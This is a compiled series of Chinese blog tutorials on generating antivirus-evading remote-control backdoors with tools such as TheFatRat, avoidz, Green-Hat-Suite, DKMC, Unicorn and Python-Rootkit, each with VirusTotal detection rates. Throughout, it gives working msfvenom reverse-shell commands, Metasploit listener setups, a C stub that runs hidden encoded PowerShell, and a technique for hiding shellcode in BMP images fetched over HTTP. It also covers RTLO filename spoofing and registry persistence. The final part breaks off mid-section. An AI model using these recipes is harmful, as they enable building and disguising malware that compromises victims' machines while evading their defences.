远控免杀合集

wholesome

远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70)

---

免杀能力一览表

​
几点说明：
1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。
2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀的精确判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、TheFatRat介绍

TheFatRat创建的后门或者payload，可以在Linux，Windows，Mac和Android上等多种平台上执行，可生成exe、apk、sh、bat、py等多种格式。TheFatRat可以和msf无缝对接，并且集成内置了Fudwin、Avoid、backdoor-factory等多个免杀工具，对powershell的免杀姿势尤其多样。

二、安装TheFatRat

推荐使用linux操作系统，如Kali、Parrot、Dracos、BackTrack、Backbox等。

1、Github安装

安装比较简单，首先从github上clone下来

1. git clone https://github.com/Screetsec/TheFatRat

复制代码

然后进入TheFatRat目录

1. cd TheFatRat

复制代码

执行安装命令

1. chmod +x setup.sh && ./setup.sh

复制代码

在成功安装后，可以查看TheFatRat/logs目录下的setup.log文件，里面是TheFatRat需要的一些软件和环境。
​

2、软件升级

作者提供了升级的命令，可直接升级软件

1. ./update && chmod + x setup.sh && ./setup.sh

复制代码

三、TheFatRat使用说明

在安装完成后，使用命令fatrat即可执行，启动略慢。TheFatRat和专题9里的Avet一样，也默认不允许远程连接后执行，只能在linux主机内执行。
​
运行时会检测一些软件或环境是否已经安装
​
同时还会有个界面提醒大家不要把生成的后门上传到virustotal.com上面，可以上传到nodistribute.com(专门试了下，但上传样本一直不成功)。
​
之后就能看到启动后的界面了
​
常用创建后门菜单如下，我自己翻译解释了一下，有个别可能不太准确。

1. [01]  Create Backdoor with msfvenom
   
2. #01：直接利用msf来生产后门，基本不能免杀
   
3. 
   
4. [02]  Create Fud 100% Backdoor with Fudwin 1.0
   
5. #02：使用Fudwin 1.0创建powershell后门，ps1利用powerstager混淆，从结果来看效果不错
   
6. 
   
7. [03]  Create Fud Backdoor with Avoid v1.2  
   
8. # 03: 使用Avoid v1.2创建后门
   
9. 
   
10. [04]  Create Fud Backdoor with backdoor-factory [embed]
    
11. #04：使用backdoor-factory创建后门
    
12. 
    
13. [05]  Backdooring Original apk [Instagram, Line,etc]
    
14. #05：生成安卓使用的apk后门
    
15. 
    
16. [06]  Create Fud Backdoor 1000% with PwnWinds [Excelent]
    
17. #06：综合了多种方式，可生成bat、exe、dll、ps1等，可利用c、C#多种语言编译，官方非常推荐，但经尝试免杀效果一般，肯定是被杀软列入特征库了
    
18. 
    
19. [07]  Create Backdoor For Office with Microsploit
    
20. #07：生成office类后门
    
21. 
    
22. [08]  Trojan Debian Package For Remote Access [Trodebi]
    
23. #08：生成linux后门

复制代码

由于01是直接调用了msfvenom生成payload，只不过稍微进行了多个msfvenom编码，免杀效果肯定一般。
[01] Create Backdoor with msfvenom生成过程如下：
​
我这里就直接使用官方推荐的2和6进行测试了。

四、使用TheFatRat生成ps1-exe(VT免杀率22/70)

在主菜单选择2，进入[02] Create Fud 100% Backdoor with Fudwin 1.0，选择1，利用powerstager混淆，并将powershell编译成exe。
​
在生成过程中可能会报错，如下所示
​
这个时候需要去查看TheFatRat/logs目录下的fudwin.log文件，看看什么报错信息。
我的第一次报错是因为python没有安装named包，第二次报错是因为输入的文件名没有写后缀，这里特别注意，必须写后缀，不然会报错。
​
​
这样就生成成功了。
在我本地机器上监听3333端口​​​​​​​

1. use exploit/multi/handler
   
2. set PAYLOAD windows/x64/meterpreter/reverse_tcp
   
3. set LHOST 10.211.55.2
   
4. set LPORT 3333
   
5. exploit -j

复制代码

在测试机器上执行payload13.exe
​
虽然报错，但可正常上线。
​
打开杀软进行测试，虽然火绒静态查杀没查出来，不过行为检测查杀到了。360静态和动态都能查杀。（病毒库均已更新到2020.01.01）
​
virustotal.com中22/70个报毒
​

五、使用TheFatRat生成加壳exe(VT免杀率12/70)

在主菜单选择2，进入[02] Create Fud 100% Backdoor with Fudwin 1.0，选择2，slow but powerfull（慢但是有效）
​
输入监听ip和端口后，可能会报错，也可能解密界面都消失，但其实后台还在运行.
看免杀过程，应该是msfvenom一定编码后进行upx加壳,可能还有其他处理，想了解详细过程的可以看下源码。
​
等一段时间后，在/root/Fatrat_Generated/目录下会发现生成了Powerfull.exe和Powerfull-fud.exe。
​
在测试机器运行，火绒静态动态都可查杀，可正常上线
​
360动态和静态都没有反应
​
virustotal.com中12/70个报毒
​

六、使用TheFatRat编译C#+powershell生成exe(VT免杀率37/71)

尝试官方比较推荐的第6种方式[06] Create Fud Backdoor 1000% with PwnWinds [Excelent],进入后菜单如下，我选择2使用c#+powershell来生成exe
​
配置好ip和端口，选择好监听payload
​
生成成功
​
可正常上线
​
打开杀软，静态检测没问题，但行为检测时360和火绒都报预警了。
​
virustotal.com中37/71个报毒
​
之后也尝试了下生成bat和dll文件，免杀率大约在18/58和22/65。

四、小结

TheFatRat创建的后门格式和支持的平台比较多样化，而且还支持生成CDROM/U盘中能自动运行(生成AutoRun文件)的后门文件，并且可以对payload更改图标，具有一定伪装效果。
TheFatRat的很多免杀方式是借助于msfvenom编码、upx等加壳压缩、c/c#编译等将powershell混淆后编译成exe或bat文件，但有些在执行时还是会调用powershell，而powershell的调用已经被各大杀软盯的很紧了，所以查杀效果只能算是一般了。
由于使用TheFatRat生成了多种payload，免杀效果各不相同，我就选了个折中一些的22/70作为TheFatRat的免杀代表。

五、参考资料

TheFatRat 一款简易后门工具：https://www.zhuanzhi.ai/document/22f6e03336336de7f211ac7b97c2fb0f
TheFatRat – 跨平台反弹后门Shell生成神器：http://caidaome.com/?post=198

wholesome

远控免杀专题(11)-Avoidz免杀(VT免杀率23/71)

---

免杀能力一览表

​
几点说明：
1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。
2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀的精确判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、avoidz介绍

Avoidz是一个比较使用比较简单的小工具，利用msf生成powershell的shellocde，然后利用c#、python、go、ruby等语言对shellcode进行编译生成exe而达到免杀的效果，套路比较简单，但免杀效果还算不错。

二、安装avoidzavoidz

使用是非常简单的，一行命令就可以，但安装比较费劲。因为官方是3年前更新的，里面有些错误，按官方的setup.sh是没法安装成功的。
首先从github上clone到本地

1. git clone https://github.com/M4sc3r4n0/avoidz

复制代码

进入avoidz目录，执行chmod +x setup.sh
执行安装程序./setup.sh
会要求按照ruby、msf、wine、wine-python、wine-pyinstaller、golong等。
​
其中会提示mingw32安装失败，主要是因为setup.sh中是用命令i586-mingw32msvc-gcc来检测是否安装，使用命令apt-get install mingw32来安装mingw32的。
而在apt安装源中已经删除了mingw32，想安装的话需要使用这个命令

1. apt install mingw-w64

复制代码

安装后会出现两个命令

1. i686-w64-mingw32-gcc  #针对32-bit Windows;
   
2. x86_64-w64-mingw32-gcc #针对64-bit Windows

复制代码

​
然后我们做个软连接，这样后面执行./avoidz.rb生成payload的时候就不会出错了。

1. ln -s /usr/bin/i686-w64-mingw32-gcc /usr/bin/i586-mingw32msvc-gcc

复制代码

安装成功
​

三、avoidz使用说明

安装好之后，使用起来非常非常简单，只有四个参数。​​​​​​​

1. -h, --lhost value                ip_addr|default = 127.0.0.1
   
2.     -p, --lport value                port_number|default = 4444
   
3.     -m, --payload value              payload to use|default = windows/meterpreter/reverse_tcp
   
4.     -f, --format value               output format: c1, c2, cs, py, go

复制代码

参数说明：
-h msf监听的IP，也就是攻击者的
-p msf监听的端口
-m msf的payload
-f 提供了5种编译格式，三种c/c#，一种python，一种go，都是生成exe文件
默认生成的payload目录为/root/目录下。

四、使用avoidz编译C#生成exe(VT免杀率23/68)

提供3种C代码编译成exe的方式，想了解详情的可以cat avoidz.rb查看具体区别。
我以第一种为例进行测试

1. ./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f c1
   

复制代码

这种方式的C代码为

1. #include <windows.h>
   
2. int shellCode(){
   
3.         system("color 63");
   
4.         system("powershell.exe -nop -win Hidden -noni -enc #{powershell_encoded}");
   
5.         /*
   
6.                 ((Shell Code into the console))
   
7.         */
   
8.         return 0;
   
9. }
   
10. void hide(){
    
11.         HWND stealth;
    
12.         AllocConsole();
    
13.         stealth = FindWindowA("ConsoleWindowClass",NULL);
    
14.         ShowWindow (stealth,0);
    
15. }
    
16. int main(){
    
17.         hide();
    
18.         shellCode();
    
19.         return 0;
    
20. }
    
21. }

复制代码

​
执行后可正常上线

开启杀软进行测试，静态测试没问题，行为检测马上露馅。
​
virustotal.com中23/68个报毒
​

五、使用avoidz编译python生成exe(VT免杀率11/68)

使用python生成exe文件

1. ./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f py

复制代码

静态查杀没问题，行为检测依据被拦
​
virustotal.com中11/68个报毒
​

六、使用avoidz编译golang生成exe(VT免杀率23/71)

使用go生成exe文件

1. ./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f go

复制代码

go版本的静态查杀都没通过，行为检测依据被拦
​
virustotal.com中23/71个报毒
​

小结

avoidz的原理还是比较简单的，msfvenom生成powershell的shellcode，然后各种语言编译一下生成exe，静态检测查杀率还算可以，但行为检测就很容易被查杀出来，和TheFatRat具有相同的缺陷。倒是可以借鉴下他的原理，自己写个免杀工具。

参考

官方使用教程：https://www.youtube.com/watch?v=ZilOByKkrVk

wholesome

远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)

免杀能力一览表

​
几点说明：
1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。
2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀的精确判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、Green-Hat-Suite介绍

Green-Hat-Suite是国内大佬Green-m的大作，Green-m大佬在freebuf和自己博客上https://green-m.me/写了很多免杀相关的文章，开始的几篇文章里面有一些知识点就是从他那学到的，而且msfvenom命令自动补全脚本也是出自他之手，之前有的知识点写的不太准备大佬也热情的给予指正，万分感谢！
Green-Hat-Suite也是和msf无缝对接的免杀工具，使用ruby开发，可在linux/windows上安装，使用非常简单，虽然已经接近两年没有更新了，但目前来看免杀效果仍然很不错。

二、安装Green-Hat-Suite

官方主页
https://github.com/Green-m/green-hat-suite
1、在kali/ubuntu/debian中安装
需要安装mingw-w64、wine、metasploit等，如果之前已经安装则不需要
从github上clone下来

1. git clone https://github.com/Green-m/green-hat-suite

复制代码

安装依赖程序

1. apt-get install metasploit-framework

复制代码

2、windows安装
从github上clone下来
git clone https://github.com/Green-m/green-hat-suite
在powershell中执行其中的install.ps1，也是安装ruby、msf、gcc、mingw-w64这些，作者说比较慢，我没在windows下安装，如有需要请自行在windows下安装测试。

三、Green-Hat-Suite使用说明

作者提供了一个使用说明
https://github.com/Green-m/green ... Use-green-hat-suite
进入Green-Hat-Suite文件夹，执行ruby greenhat.rb
​
根据提示选择payload就可以
​
其中有个其他选项的设置，可以参考msf的payload高级选项,在msf中使用advanced即可查看
​
感兴趣的可以看看lib目录下的一些处理过程。
​

四、生成后门

先用常规的reverse_tcp生成后门试一下，所有都用默认选项
​
不开杀软时，可正常上线
​
打开杀软进行测试，可过火绒的静态查杀，但行为查杀时360和火绒均能查杀
​
virustotal.com中27/71个报毒
​
因为Green-Hat-Suite使用了多种方式对shellocde进行处理，所以导致每次生成的shellcode都不同，被查杀的概率也不一样。
后来试了下其他几个payload，目前最好的查杀结果是17/71，还有几次都是在20-30/70范围内波动，也有个别的查杀率在30-40之间。
virustotal.com中23/70个报毒
​

五、小结

Green-Hat-Suite调用了msfvenom进行随机编码生成shellcode，然后Green-Hat-Suite对shellcode进行多重免杀处理混淆，并最终编译生成不同的exe后门文件。虽然原理不算复杂，但两年前的作品，至今来说免杀效果仍很不错。

参考

官方使用教程：https://github.com/Green-m/green ... Use-green-hat-suite

wholesome

远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)

---

免杀能力一览表

​
几点说明：
1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。
2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀的精确判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、zirikatu介绍

zirikatu是一个用bash编写的小脚本，依赖于msf、mono、mcs等软件，也是调用msfvenom生成shellcode,然后将shellcode嵌入C#代码，试用Mcs编译生成exe后门。
Mono可以让.NET程序跨平台运行在Linux,BSD,Windows,MacOS,Sun Solaris,Wii,索尼PlayStation,苹果iPhone等几乎所有常见的操作系统之上。从Mono2.11版本开始，采用的编译器叫mcs，它的作用是将C#编译为CIL（Common Language Infrastructure，通用中间语言，也叫MSIL微软中间语言，这个语言能运行在所有支持CIL的环境中）
二、安装zirikatu下载到本地

1. git clone https://github.com/pasahitz/zirikatu.git

复制代码

三、zirikatu使用说明执行命令

1. chmod +x zirikatu.sh
   
2. ./zirikatu.sh

复制代码

​

四、生成后门

还是使用最常规的reverse_tcp进行测试,选项都比较简单，默认填写就可以
​
测试机执行，360和火绒静态检测和动态检测都可以bypass
那个弹窗是我故意加的，生成payload的时候不加就可以
​
msf可正常上线
​
virustotal.com中39/71个报毒,以为能过360和火绒，免杀应该不错的...
​

五、小结

zirikatu利用msfvenom生成shellcode，之后再进行一定处理，编译生成exe。原理比较简单，操作比较方便，免杀效果相比专题12里的Green-Hat-Suite来说虽然一般，但能过360、火绒和瑞星的确有点出人意料。

参考

Msf&zirikatu免杀结合利用：http://www.secist.com/archives/3113.html

wholesome

远控免杀专题(14)-AVIator(VT免杀率25/69)

---

免杀能力一览表

​
几点说明：
1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。
2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀的精确判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、AVIator介绍

AVIator使用AES加密来加密Shellcode，生成一个包含加密有效负载的可执行文件，然后使用各种注入技术将shellcode解密并注入到目标系统，从而绕过杀毒软件的检测。

二、安装AVIator

AVIator只有windows版，c#开发，单文件exe。
安装也非常方便，直接从github上下载下来。
git clone https://github.com/Ch0pin/AVIator
或者直接下载压缩包https://github.com/Ch0pin/AVIator/archive/master.zip
解压后在Compiled Binaries文件夹中有x86和x64的可执行exe文件，执行即可
​

使用也非常简单，只需要填入payload后简单设置一下就可以。

三、AVIator生成后门

首先要使用msf生成shellceode，需要基于c#，我就用msf生成一个最基础的

1. msfvenom -p windows/meterpreter/reverse_https  LHOST=10.211.55.2 LPORT=3333  -f csharp -o test11.c

复制代码

​
在AVIator中对shellcode进行处理，AES KEY和IV默认就可以
payload地方填入上面生成的test11.c文件内容，然后点击Encrypt，生成加密后的payload。

​

目标操作系统架构根据实际情况选择就可以，x86比较通用一些。
下面还有个Injection Techniques，需要选择注入技术，我这选择第二个注入Notepad++进程
​
另外，软件还提供了RTLO选项，可以使可执行文件名看起来伪装性更好。比如，启用该选项后，文件testcod.exe将被保存文件名为testexe.doc，但文件还是可以正常被当做exe执行的。但是，选择了RTLO选项虽然更迷惑人，但也更容易被杀软报警告。
还可以自定义程序ico图标，增强伪装，我这就不配置了。
​
点击generate后就可以生成后门程序了。
​
不开杀软的时候可正常上线
​
打开杀软进行测试，可过360和火绒动静态检测
​
比较诡异的是360安全卫士的行为检测发现木马行为
​
但火绒和360杀毒没点反应，可正常上线
​
virustotal.com中30/69个报毒
​
后来我没启用RTLO选项又生成了一个正常的exe文件，看来RTLO选项影响还挺大。
virustotal.com中25/69个报毒
​

四、小结

参考

官方说明文档：https://github.com/Ch0pin/AVIator

wholesome

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

---

免杀能力一览表

​

几点说明：

1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。

2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀的精确判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、DKMC介绍

DKMC是Don't Kill My Cat (DKMC)的简称，谷歌翻译为"不要杀害我的小猫咪"，这个名字也是挺少女心的...DKMC是一种生成混淆的shellcode的工具，并把shellcode合成到图像文件中，最终依靠PowerShell执行最终的shellcode有效负载。

二、安装DKMC

安装比较简单

1. $ git clone https://github.com/Mr-Un1k0d3r/DKMC
   
2. $ cd DKMC
   
3. $ mkdir output

复制代码

执行python dkmc.py即可

​

三、DKMC使用说明

执行python dkmc.py后可以看到5个选项，

1. (gen)        Generate a malicious BMP image
   
2. (web)        Start a web server and deliver malicious image
   
3. (ps)        Generate Powershell payload
   
4. (sc)        Generate shellcode from raw file
   
5. (exit)        Quit the application

复制代码

翻译一下

1. (gen)        将msf的shellcode注入到一个BMP图像
   
2. (web)        启动web服务用来分发BMP图像
   
3. (ps)        生成ps的payload
   
4. (sc)        将msf生成的raw文件转为shellcode
   
5. (exit)        退出

复制代码

这几个选项可不是都能生成payload，而是一起组合来生成免杀的文件。
生成一个后门的流程大体为：1、先利用msf生成raw文件
2、利用sc讲raw文件转换为shellcode

3、利用gen将上一步的shellcode注入到一个BMP图像
4、利用ps生成基于powershell的BMP文件的payload
5、利用web提供的简单web服务进行分发BMP文件
4和5看起来有点乱，下面我演示一下就很容易明白了。

四、利用DKMC生成后门

1、先利用Msf生成raw格式的shellcode，稍微编码了一下

1. msfvenom -p windows/meterpreter/reverse_https  LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 -f raw -o /root/test15.raw

复制代码

​
2、在主菜单中选择sc,然后设置source为/root/test15.raw,再执行run生成shellcode。
​
复制一下生成的shellcode,输入exit退回到主菜单。
3、在主菜单中选择gen,然后设置shellcode为上一步中生成的shellcode。
其他默认即可，执行run生成图像。
​
看到生成了output-1577907077.bmp图像文件，输入exit退回到主菜单。
4、在主菜单中选择ps,设置url地址，这个url地址就是web分发图像文件的地址。
我的parrot虚拟机的地址为10.211.55.24，我打算用默认的80端口，这样我的url地址为http://10.211.55.24/output-1577907077.bmp
使用命令set url ，然后执行run生成powershell执行脚本。
​
复制一下生成的ps代码，输入exit退回到主菜单。
5、最后一步，在主菜单中选择web,使用默认80端口，执行run即可。
​
访问虚拟机的80端口
​
图像可以正常打开
​
6、在我的测试机器上执行第4步生成的ps代码，不开杀软的时候可正常上线
我将ps执行代码中的-w hidden先去掉，这样可以看得直观一些
​
​
7、打开杀软进行测试
静态查杀都通过
​
在执行powershell代码时，火绒和360卫士会拦截报警，360杀毒没有反应
​
​
virustotal.com上BMP文件的查杀率为5/55，查杀出来为BMP木马
​
virustotal.com上ps代码的查杀率为8/55，判断ps下载行为。
​

四、小结

DKMC主要把shellcode注入到bmp图像中，然后使用powershell来执行其中的shellcode，但是很多杀软都会监测powershell的执行动作，所以virustotal.com的静态检测不足以说明什么。其实还可以进一步对ps执行代码进行混淆免杀，这一点后续文章还会涉及这里就不展开说了。

参考

官方说明文档：https://github.com/Mr-Un1k0d3r/DKMC

wholesome

远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)

---

免杀能力一览表

​
几点说明：
1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。
2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀或杀软能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、Unicorn介绍

Magic Unicorn是一个比较简单的小工具，主要是基于Matthew Graeber提出的PowerShell攻击技术以及David Kennedy和Josh Kelly 提出的powershell bypass技术，把所有payload都转换成powershell代码。
Magic Unicorn支持cobalt strike、Metasploit和自定义的shellcode。

二、安装Unicorn

安装比较简单

1. git clone https://github.com/trustedsec/unicorn.git

复制代码

都不需要安装其他的python库，就可以直接运行。
当然还是需要已经安装了Msf才行，因为Unicorn生成payload还是依赖msf,只不过它把payload转换成了powershell命令来运行。
执行python unicorn.py即可。
​

三、Unicorn使用说明

可以使用python unicorn.py --help命令查看详细帮助
主要的几个用法如下：

1. Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
   
2. PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
   
3. PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
   
4. PS Down/Exec Macro: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe macro
   
5. Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
   
6. Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
   
7. HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
   
8. HTA SettingContent-ms Metasploit: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms
   
9. HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
   
10. HTA Example SettingContent-ms: python unicorn.py <cobalt_strike_file.cs cs ms
    
11. HTA Example SettingContent-ms: python unicorn.py <patth_to_shellcode.txt>: shellcode ms
    
12. DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
    
13. CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
    
14. Custom PS1 Example: python unicorn.py <path to ps1 file>
    
15. Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
    
16. Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
    
17. Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00 or metasploit)
    
18. Custom Shellcode HTA: python unicorn.py <path_to_shellcode.txt> shellcode hta (formatted 0x00 or metasploit)
    
19. Custom Shellcode Macro: python unicorn.py <path_to_shellcode.txt> shellcode macro (formatted 0x00 or metasploit)
    
20. Generate .SettingContent-ms: python unicorn.py ms
    
21. Help Menu: python unicorn.py --help

复制代码

支持生成ps1、macro、hta、dde等形式的代码和文件。

四、利用Unicorn生成后门

我以最常规的windows/meterpreter/reverse_https来生成payload
生成命令为

1. python unicorn.py windows/meterpreter/reverse_https 10.211.55.2 3334

复制代码

其中10.211.55.2和3334是我msf监听的ip和端口
​
生成了两个文件powershell_attack.txt和unicorn.rc
其中powershell_attack.txt是生成的payload
​
而unicorn.rc是msf配置文件，也就是用msfconsole -r unicorn.rc命令可以快捷的启动msf并监听相应端口
​
然后我们在测试机器上执行powershell_attack.txt里的代码
​
可正常上线
​
可以把powershell代码转换成exe，使用bat2exe就可以，生成ps1.exe
​
执行ps1.exe，发现触发了360安全卫士的行为检测，不过火绒没有反应。
​
virustotal.com上powershell_attack.txt文件的查杀率为14/57
​
virustotal.com上ps1.exe文件的查杀率为36/69，转exe后略微有点惨。
​
后来生成了一个hta文件进行测试，virustotal.com上查杀率为29/56
​

四、小结

Unicorn使用比较简单，可以生成powershell代码、macro宏代码、hta、dde等格式的payload文件，可以在社工时直接使用，不过因为生成的代码关键字比较明显，所以静态查杀很多都没通过，只能说生成代码多样但免杀效果一般。
上面用到bat2exe工具和zirikatu已经放在tools文件夹中,还算挺好使。

1. https://github.com/TideSec/BypassAntiVirus/tree/master/tools

复制代码

参考

magic-unicorn：https://www.hackingarticles.in/m ... -exploitation-tool/
过win10防火墙和windows defender：https://null-byte.wonderhowto.co ... s-software-0185055/

wholesome

远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)

---

免杀能力一览表

​
几点说明：
1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。
2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、Python-Rootkit介绍

Python-Rootkit，2017年开源的一款工具，当时号称Bypass all anti-virus，主要是对python代码进行多次编码，然后利用py2exe把python代码打包成exe，其实最终执行的是powershell命令，使用了PowerSploit的Invoke-Shellcode.ps1来反弹msf的shell。
程序还添加了后门持续化的功能，大体就是10秒钟检测一次连接是否正常，如果连接不存在就再重连msf，另外还使用了注册表添加了自启动项。
原理很简单，不过我在前期测试中浪费了很长时间。。请往下看

二、安装Python-Rootkit

因为要使用py2exe，所以我就在windows上安装了，如果linux上安装了wine后不知道能不能使用py2exe，可自行测试。
1、先从官网git到本地

1. git clone https://github.com/0xIslamTaha/Python-Rootkit

复制代码

2、修改参数
进入Python-Rootkit\viRu5文件夹
打开source.py文件，修改其中的LHOTS和LPORT，这个文件也是后门的主代码
​
然后删掉或重命名viRu5文件夹中原有的GoogleChromeAutoLaunch.py,把source.py改名为GoogleChromeAutoLaunch.py
3、安装py2exe
然后还需要安装py2exe，我已经下载好了一份python2.7的py2exe安装文件py2exe-0.6.9.win32-py2.7.exe,下载地址https://github.com/TideSec/Bypas ... 6.9.win32-py2.7.exe，下载安装即可。
4、安装metasploit
郑重提示：需要安装需要4.8.2及以下的版本
如果你的msf为4.8.2以上版本，那么后门是反弹不成shell的。期间看到有人说是powershell需要32位的，还有说是需要msf生成shellcode进行配合的，众说纷纭，然后都没解决我的问题。
我就是在这里摸索了好长时间，才发现是msf和PowerSploit的问题，大体是msf升级到5.0后、PowerSploit升级到3.0后有些之前的功能就不大好使了。
所以后来我单独在另一台ubuntu上安装了metasploit 4.8.2，下载安装

1. wget https://downloads.metasploit.com ... x-x64-installer.run

复制代码

一路下一步和y确认就可以
​

三、Python-Rootkit使用说明

Python-Rootkit使用很简单，只要安装好上面的插件后，执行python.exe setup.py就可以了。
经分析，整个工具的核心代码就一句，下载Invoke-Shellcode.ps1，反弹shell。

